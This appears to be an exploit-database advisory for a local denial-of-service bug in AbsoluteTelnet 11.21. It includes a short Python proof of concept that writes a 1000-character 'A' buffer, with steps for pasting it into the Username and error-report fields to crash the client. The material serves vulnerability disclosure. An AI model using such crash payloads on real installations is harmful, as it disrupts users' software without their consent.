AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)

vendor:

AbsoluteTelnet

by:

Xenofon Vassilakopoulos

5.5

CVSS

MEDIUM

Denial of Service (DoS) Local

CWE

Product Name: AbsoluteTelnet

Affected Version From: 11.21

Affected Version To: 11.21

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 Professional x86 SP1

2020

AbsoluteTelnet 11.21 – ‘Username’ Denial of Service (PoC)

AbsoluteTelnet 11.21 is vulnerable to a denial of service (DoS) attack when a specially crafted input is provided to the 'Username' field. This can be exploited by an attacker to crash the application. The vulnerability can also be triggered when attempting to send an error report after the application has crashed. By providing a specific input in the 'Your Email Address (optional)' field, the application crashes again.

Mitigation:

There is currently no known mitigation for this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)
# Discovered by: Xenofon Vassilakopoulos
# Discovered Date: 2020-05-21
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.21.exe
# Tested Version: 11.21
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1

# Description: AbsoluteTelnet 11.21 - 'SHA2/Username' and 'Send Error Report' Denial of Service (PoC)

# Steps to reproduce:
# 1. - Run python script
# 2. - Open absolutetelnet.txt and copy content to clipboard
# 3. - Open AbsoluteTelnet 11.21
# 4. - Select "new connection file -> Connection -> SSH2" 
# 5. - Paste the contents at the field "Authentication -> Username" 
# 6. - press "ok" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.21
# 9. - A new window will appear that prompts you to send an error report
# 10.- Open absolutetelnet.txt and copy content to clipboard
# 11.- Paste the contents at the field "Your Email Address (optional)"
# 12.- press "Send Error Report" button
# 13.- Crashed

buf = "\x41" * 1000
f = open ("absolutetelnet.txt", "w")
f.write(buf)
f.close()